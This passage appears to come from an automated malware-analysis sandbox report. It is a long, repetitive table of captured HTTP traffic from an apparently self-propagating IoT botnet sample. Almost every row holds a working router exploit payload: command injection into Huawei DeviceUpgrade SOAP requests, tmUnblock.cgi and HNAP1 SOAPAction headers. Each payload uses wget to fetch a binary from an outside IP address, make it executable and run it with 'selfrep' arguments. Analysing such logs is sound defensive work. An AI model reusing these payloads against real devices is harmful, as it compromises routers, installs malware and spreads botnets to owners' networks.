6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
